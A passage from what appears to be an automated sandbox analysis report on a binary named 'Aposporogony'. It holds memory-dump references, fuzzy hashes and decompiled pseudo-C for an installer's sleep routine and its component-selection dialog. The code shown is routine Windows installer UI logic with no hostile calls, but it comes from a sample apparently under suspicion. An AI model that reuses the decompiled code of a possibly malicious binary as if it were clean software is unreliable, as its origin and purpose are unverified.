                                                                                                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2972824698-0
                                                                                                                                                                                      • Opcode ID: 916e176333ae49e619db6cd6995b037fea719869e1ab03b2077061b9cebe8fc4
                                                                                                                                                                                      • Instruction ID: 10a4e636b43d3a3985a1d0cc463e40b1499b59a482d83744678f668e8fa05086
                                                                                                                                                                                      • Opcode Fuzzy Hash: 916e176333ae49e619db6cd6995b037fea719869e1ab03b2077061b9cebe8fc4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF09632905011D7CB20FBA189445DE77A49F40318B24417BF901B21D1C77D4D419A6E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E004014D7(intOrPtr __edx) {
                                                                                                                                                                                      				long _t3;
                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                      				intOrPtr _t10;
                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                      				_t3 = E00402C1F(_t7);
                                                                                                                                                                                      				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
                                                                                                                                                                                      				if(_t3 <= 1) {
                                                                                                                                                                                      					_t3 = 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				Sleep(_t3); // executed
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x004014d7
                                                                                                                                                                                      0x004014d8
                                                                                                                                                                                      0x004014e1
                                                                                                                                                                                      0x004014e4
                                                                                                                                                                                      0x004014e8
                                                                                                                                                                                      0x004014e8
                                                                                                                                                                                      0x004014ea
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                      • Opcode ID: ee6c9b61dd640909b9844f7e044d08b00998cb5abf49163e11116682d3f6efe0
                                                                                                                                                                                      • Instruction ID: 470c55c4710008b6728c6b90433ede44792ead4b8f1b0cbb9daa04c94bfebbac
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee6c9b61dd640909b9844f7e044d08b00998cb5abf49163e11116682d3f6efe0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 89D0A773F142008BD720DBB8BE8945E73E8E780319330883BE102F11D1E978D8928E2D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                      			E00404DCC(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                                                      				struct HWND__* _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				signed char* _v28;
                                                                                                                                                                                      				long _v32;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				int _v44;
                                                                                                                                                                                      				signed int* _v56;
                                                                                                                                                                                      				signed char* _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				long _v68;
                                                                                                                                                                                      				void* _v72;
                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                      				void* _v84;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				signed int _t192;
                                                                                                                                                                                      				intOrPtr _t195;
                                                                                                                                                                                      				long _t201;
                                                                                                                                                                                      				signed int _t205;
                                                                                                                                                                                      				signed int _t216;
                                                                                                                                                                                      				void* _t219;
                                                                                                                                                                                      				void* _t220;
                                                                                                                                                                                      				int _t226;
                                                                                                                                                                                      				signed int _t231;
                                                                                                                                                                                      				signed int _t232;
                                                                                                                                                                                      				signed int _t233;
                                                                                                                                                                                      				signed int _t239;
                                                                                                                                                                                      				signed int _t241;
                                                                                                                                                                                      				signed char _t242;
                                                                                                                                                                                      				signed char _t248;
                                                                                                                                                                                      				void* _t252;
                                                                                                                                                                                      				void* _t254;
                                                                                                                                                                                      				signed char* _t270;
                                                                                                                                                                                      				signed char _t271;
                                                                                                                                                                                      				long _t276;
                                                                                                                                                                                      				int _t282;
                                                                                                                                                                                      				signed int _t283;
                                                                                                                                                                                      				long _t284;
                                                                                                                                                                                      				signed int _t287;
                                                                                                                                                                                      				signed int _t294;
                                                                                                                                                                                      				signed char* _t302;
                                                                                                                                                                                      				struct HWND__* _t306;
                                                                                                                                                                                      				int _t307;
                                                                                                                                                                                      				signed int* _t308;
                                                                                                                                                                                      				int _t309;
                                                                                                                                                                                      				long _t310;
                                                                                                                                                                                      				signed int _t311;
                                                                                                                                                                                      				void* _t313;
                                                                                                                                                                                      				long _t314;
                                                                                                                                                                                      				int _t315;
                                                                                                                                                                                      				signed int _t316;
                                                                                                                                                                                      				void* _t318;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t306 = _a4;
                                                                                                                                                                                      				_v12 = GetDlgItem(_t306, 0x3f9);
                                                                                                                                                                                      				_v8 = GetDlgItem(_t306, 0x408);
                                                                                                                                                                                      				_t318 = SendMessageW;
                                                                                                                                                                                      				_v20 =  *0x42a288;
                                                                                                                                                                                      				_t282 = 0;
                                                                                                                                                                                      				_v24 =  *0x42a254 + 0x94;
                                                                                                                                                                                      				if(_a8 != 0x110) {
                                                                                                                                                                                      					L23:
                                                                                                                                                                                      					if(_a8 != 0x405) {
                                                                                                                                                                                      						_t285 = _a16;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_a12 = _t282;
                                                                                                                                                                                      						_t285 = 1;
                                                                                                                                                                                      						_a8 = 0x40f;
                                                                                                                                                                                      						_a16 = 1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                                                                                      						_v16 = _t285;
                                                                                                                                                                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                                                                                                                                                      							if(( *0x42a25d & 0x00000002) != 0) {
                                                                                                                                                                                      								L41:
                                                                                                                                                                                      								if(_v16 != _t282) {
                                                                                                                                                                                      									_t231 = _v16;
                                                                                                                                                                                      									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                                                                                                                                                      										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t232 = _v16;
                                                                                                                                                                                      									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                                                                                                                                                      										_t285 = _v20;
                                                                                                                                                                                      										_t233 =  *(_t232 + 0x5c);
                                                                                                                                                                                      										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                                                                                                                                                      											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L48;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_a8 == 0x413) {
                                                                                                                                                                                      								L33:
                                                                                                                                                                                      								_t285 = 0 | _a8 != 0x00000413;
                                                                                                                                                                                      								_t239 = E00404D1A(_v8, _a8 != 0x413);
                                                                                                                                                                                      								_t311 = _t239;
                                                                                                                                                                                      								if(_t311 >= _t282) {
                                                                                                                                                                                      									_t88 = _v20 + 8; // 0x8
                                                                                                                                                                                      									_t285 = _t239 * 0x818 + _t88;
                                                                                                                                                                                      									_t241 =  *_t285;
                                                                                                                                                                                      									if((_t241 & 0x00000010) == 0) {
                                                                                                                                                                                      										if((_t241 & 0x00000040) == 0) {
                                                                                                                                                                                      											_t242 = _t241 ^ 0x00000001;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t248 = _t241 ^ 0x00000080;
                                                                                                                                                                                      											if(_t248 >= 0) {
                                                                                                                                                                                      												_t242 = _t248 & 0x000000fe;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t242 = _t248 | 0x00000001;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										 *_t285 = _t242;
                                                                                                                                                                                      										E0040117D(_t311);
                                                                                                                                                                                      										_a12 = _t311 + 1;
                                                                                                                                                                                      										_a16 =  !( *0x42a25c) >> 0x00000008 & 0x00000001;
                                                                                                                                                                                      										_a8 = 0x40f;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L41;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t285 = _a16;
                                                                                                                                                                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                                                                                      								goto L41;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L33;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							goto L48;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						L48:
                                                                                                                                                                                      						if(_a8 != 0x111) {
                                                                                                                                                                                      							L56:
                                                                                                                                                                                      							if(_a8 == 0x200) {
                                                                                                                                                                                      								SendMessageW(_v8, 0x200, _t282, _t282);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_a8 == 0x40b) {
                                                                                                                                                                                      								_t219 =  *0x42370c;
                                                                                                                                                                                      								if(_t219 != _t282) {
                                                                                                                                                                                      									ImageList_Destroy(_t219);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t220 =  *0x423720;
                                                                                                                                                                                      								if(_t220 != _t282) {
                                                                                                                                                                                      									GlobalFree(_t220);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *0x42370c = _t282;
                                                                                                                                                                                      								 *0x423720 = _t282;
                                                                                                                                                                                      								 *0x42a2c0 = _t282;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_a8 != 0x40f) {
                                                                                                                                                                                      								L88:
                                                                                                                                                                                      								if(_a8 == 0x420 && ( *0x42a25d & 0x00000001) != 0) {
                                                                                                                                                                                      									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                                                                                      									ShowWindow(_v8, _t307);
                                                                                                                                                                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L91;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								E004011EF(_t285, _t282, _t282);
                                                                                                                                                                                      								_t192 = _a12;
                                                                                                                                                                                      								if(_t192 != _t282) {
                                                                                                                                                                                      									if(_t192 != 0xffffffff) {
                                                                                                                                                                                      										_t192 = _t192 - 1;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_push(_t192);
                                                                                                                                                                                      									_push(8);
                                                                                                                                                                                      									E00404D9A();
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_a16 == _t282) {
                                                                                                                                                                                      									L75:
                                                                                                                                                                                      									E004011EF(_t285, _t282, _t282);
                                                                                                                                                                                      									_v32 =  *0x423720;
                                                                                                                                                                                      									_t195 =  *0x42a288;
                                                                                                                                                                                      									_v60 = 0xf030;
                                                                                                                                                                                      									_v20 = _t282;
                                                                                                                                                                                      									if( *0x42a28c <= _t282) {
                                                                                                                                                                                      										L86:
                                                                                                                                                                                      										InvalidateRect(_v8, _t282, 1);
                                                                                                                                                                                      										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
                                                                                                                                                                                      											E00404CD5(0x3ff, 0xfffffffb, E00404CED(5));
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L88;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t308 = _t195 + 8;
                                                                                                                                                                                      									do {
                                                                                                                                                                                      										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                                                                                                                                                      										if(_t201 != _t282) {
                                                                                                                                                                                      											_t287 =  *_t308;
                                                                                                                                                                                      											_v68 = _t201;
                                                                                                                                                                                      											_v72 = 8;
                                                                                                                                                                                      											if((_t287 & 0x00000001) != 0) {
                                                                                                                                                                                      												_v72 = 9;
                                                                                                                                                                                      												_v56 =  &(_t308[4]);
                                                                                                                                                                                      												_t308[0] = _t308[0] & 0x000000fe;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if((_t287 & 0x00000040) == 0) {
                                                                                                                                                                                      												_t205 = (_t287 & 0x00000001) + 1;
                                                                                                                                                                                      												if((_t287 & 0x00000010) != 0) {
                                                                                                                                                                                      													_t205 = _t205 + 3;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t205 = 3;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                                                                                                                                                      											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                                                                                                                      											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_v20 = _v20 + 1;
                                                                                                                                                                                      										_t308 =  &(_t308[0x206]);
                                                                                                                                                                                      									} while (_v20 <  *0x42a28c);
                                                                                                                                                                                      									goto L86;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t309 = E004012E2( *0x423720);
                                                                                                                                                                                      									E00401299(_t309);
                                                                                                                                                                                      									_t216 = 0;
                                                                                                                                                                                      									_t285 = 0;
                                                                                                                                                                                      									if(_t309 <= _t282) {
                                                                                                                                                                                      										L74:
                                                                                                                                                                                      										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                                                                                                                                                      										_a16 = _t309;
                                                                                                                                                                                      										_a8 = 0x420;
                                                                                                                                                                                      										goto L75;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L71;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									do {
                                                                                                                                                                                      										L71:
                                                                                                                                                                                      										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                                                                                                                                                      											_t285 = _t285 + 1;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t216 = _t216 + 1;
                                                                                                                                                                                      									} while (_t216 < _t309);
                                                                                                                                                                                      									goto L74;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                                                                                      							goto L91;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                                                                                                                                                      							if(_t226 == 0xffffffff) {
                                                                                                                                                                                      								goto L91;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                                                                                                                                                      							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                                                                                                                                                      								_t310 = 0x20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E00401299(_t310);
                                                                                                                                                                                      							SendMessageW(_a4, 0x420, _t282, _t310);
                                                                                                                                                                                      							_a12 = _a12 | 0xffffffff;
                                                                                                                                                                                      							_a16 = _t282;
                                                                                                                                                                                      							_a8 = 0x40f;
                                                                                                                                                                                      							goto L56;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_v32 = 0;
                                                                                                                                                                                      					_v16 = 2;
                                                                                                                                                                                      					 *0x42a2c0 = _t306;
                                                                                                                                                                                      					 *0x423720 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                                                                                                                                      					_t252 = LoadBitmapW( *0x42a240, 0x6e);
                                                                                                                                                                                      					 *0x423714 =  *0x423714 | 0xffffffff;
                                                                                                                                                                                      					_t313 = _t252;
                                                                                                                                                                                      					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E004053C4);
                                                                                                                                                                                      					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                                                                                      					 *0x42370c = _t254;
                                                                                                                                                                                      					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                                                                                                                                                      					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
                                                                                                                                                                                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                                                                                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					DeleteObject(_t313);
                                                                                                                                                                                      					_t314 = 0;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                                                                                                                                                      						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                                                                                                                                                      							if(_t314 != 0x20) {
                                                                                                                                                                                      								_v16 = _t282;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E0040640A(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t314 = _t314 + 1;
                                                                                                                                                                                      					} while (_t314 < 0x21);
                                                                                                                                                                                      					_t315 = _a16;
                                                                                                                                                                                      					_t283 = _v16;
                                                                                                                                                                                      					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                                                                                                                                                      					_push(0x15);
                                                                                                                                                                                      					E0040435F(_a4);
                                                                                                                                                                                      					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                                                                                                                                                      					_push(0x16);
                                                                                                                                                                                      					E0040435F(_a4);
                                                                                                                                                                                      					_t316 = 0;
                                                                                                                                                                                      					_t284 = 0;
                                                                                                                                                                                      					if( *0x42a28c <= 0) {
                                                                                                                                                                                      						L19:
                                                                                                                                                                                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t302 = _v20 + 8;
                                                                                                                                                                                      						_v28 = _t302;
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							_t270 =  &(_t302[0x10]);
                                                                                                                                                                                      							if( *_t270 != 0) {
                                                                                                                                                                                      								_v60 = _t270;
                                                                                                                                                                                      								_t271 =  *_t302;
                                                                                                                                                                                      								_t294 = 0x20;
                                                                                                                                                                                      								_v84 = _t284;
                                                                                                                                                                                      								_v80 = 0xffff0002;
                                                                                                                                                                                      								_v76 = 0xd;
                                                                                                                                                                                      								_v64 = _t294;
                                                                                                                                                                                      								_v40 = _t316;
                                                                                                                                                                                      								_v68 = _t271 & _t294;
                                                                                                                                                                                      								if((_t271 & 0x00000002) == 0) {
                                                                                                                                                                                      									if((_t271 & 0x00000004) == 0) {
                                                                                                                                                                                      										 *( *0x423720 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_v76 = 0x4d;
                                                                                                                                                                                      									_v44 = 1;
                                                                                                                                                                                      									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                                                                                                                                      									_v32 = 1;
                                                                                                                                                                                      									 *( *0x423720 + _t316 * 4) = _t276;
                                                                                                                                                                                      									_t284 =  *( *0x423720 + _t316 * 4);
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t316 = _t316 + 1;
                                                                                                                                                                                      							_t302 =  &(_v28[0x818]);
                                                                                                                                                                                      							_v28 = _t302;
                                                                                                                                                                                      						} while (_t316 <  *0x42a28c);
                                                                                                                                                                                      						if(_v32 != 0) {
                                                                                                                                                                                      							L20:
                                                                                                                                                                                      							if(_v16 != 0) {
                                                                                                                                                                                      								E00404394(_v8);
                                                                                                                                                                                      								_t282 = 0;
                                                                                                                                                                                      								goto L23;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								ShowWindow(_v12, 5);
                                                                                                                                                                                      								E00404394(_v12);
                                                                                                                                                                                      								L91:
                                                                                                                                                                                      								return E004043C6(_a8, _a12, _a16);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L19;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}




























































                                                                                                                                                                                      0x00404ddb
                                                                                                                                                                                      0x00404dec
                                                                                                                                                                                      0x00404df1
                                                                                                                                                                                      0x00404df9
                                                                                                                                                                                      0x00404dff
                                                                                                                                                                                      0x00404e07
                                                                                                                                                                                      0x00404e15
                                                                                                                                                                                      0x00404e18
                                                                                                                                                                                      0x00405039
                                                                                                                                                                                      0x00405040
                                                                                                                                                                                      0x00405054
                                                                                                                                                                                      0x00405042
                                                                                                                                                                                      0x00405044
                                                                                                                                                                                      0x00405047
                                                                                                                                                                                      0x00405048
                                                                                                                                                                                      0x0040504f
                                                                                                                                                                                      0x0040504f
                                                                                                                                                                                      0x00405060
                                                                                                                                                                                      0x0040506e
                                                                                                                                                                                      0x00405071
                                                                                                                                                                                      0x00405087
                                                                                                                                                                                      0x004050fc
                                                                                                                                                                                      0x004050ff
                                                                                                                                                                                      0x00405101
                                                                                                                                                                                      0x0040510b
                                                                                                                                                                                      0x00405119
                                                                                                                                                                                      0x00405119
                                                                                                                                                                                      0x0040511b
                                                                                                                                                                                      0x00405125
                                                                                                                                                                                      0x0040512b
                                                                                                                                                                                      0x0040512e
                                                                                                                                                                                      0x00405131
                                                                                                                                                                                      0x0040514c
                                                                                                                                                                                      0x00405133
                                                                                                                                                                                      0x0040513d
                                                                                                                                                                                      0x0040513d
                                                                                                                                                                                      0x00405131
                                                                                                                                                                                      0x00405125
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004050ff
                                                                                                                                                                                      0x0040508c
                                                                                                                                                                                      0x00405097
                                                                                                                                                                                      0x0040509c
                                                                                                                                                                                      0x004050a3
                                                                                                                                                                                      0x004050a8
                                                                                                                                                                                      0x004050ac
                                                                                                                                                                                      0x004050b7
                                                                                                                                                                                      0x004050b7
                                                                                                                                                                                      0x004050bb
                                                                                                                                                                                      0x004050bf
                                                                                                                                                                                      0x004050c3
                                                                                                                                                                                      0x004050d6
                                                                                                                                                                                      0x004050c5
                                                                                                                                                                                      0x004050c5
                                                                                                                                                                                      0x004050cc
                                                                                                                                                                                      0x004050d2
                                                                                                                                                                                      0x004050ce
                                                                                                                                                                                      0x004050ce
                                                                                                                                                                                      0x004050ce
                                                                                                                                                                                      0x004050cc
                                                                                                                                                                                      0x004050da
                                                                                                                                                                                      0x004050dc
                                                                                                                                                                                      0x004050ef
                                                                                                                                                                                      0x004050f2
                                                                                                                                                                                      0x004050f5
                                                                                                                                                                                      0x004050f5
                                                                                                                                                                                      0x004050bf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004050ac
                                                                                                                                                                                      0x0040508e
                                                                                                                                                                                      0x00405095
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040514f
                                                                                                                                                                                      0x0040514f
                                                                                                                                                                                      0x00405156
                                                                                                                                                                                      0x004051c7
                                                                                                                                                                                      0x004051cf
                                                                                                                                                                                      0x004051d7
                                                                                                                                                                                      0x004051d7
                                                                                                                                                                                      0x004051e0
                                                                                                                                                                                      0x004051e2
                                                                                                                                                                                      0x004051e9
                                                                                                                                                                                      0x004051ec
                                                                                                                                                                                      0x004051ec
                                                                                                                                                                                      0x004051f2
                                                                                                                                                                                      0x004051f9
                                                                                                                                                                                      0x004051fc
                                                                                                                                                                                      0x004051fc
                                                                                                                                                                                      0x00405202
                                                                                                                                                                                      0x00405208
                                                                                                                                                                                      0x0040520e
                                                                                                                                                                                      0x0040520e
                                                                                                                                                                                      0x0040521b
                                                                                                                                                                                      0x00405371
                                                                                                                                                                                      0x00405378
                                                                                                                                                                                      0x00405395
                                                                                                                                                                                      0x0040539b
                                                                                                                                                                                      0x004053ad
                                                                                                                                                                                      0x004053ad
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405221
                                                                                                                                                                                      0x00405223
                                                                                                                                                                                      0x00405228
                                                                                                                                                                                      0x0040522d
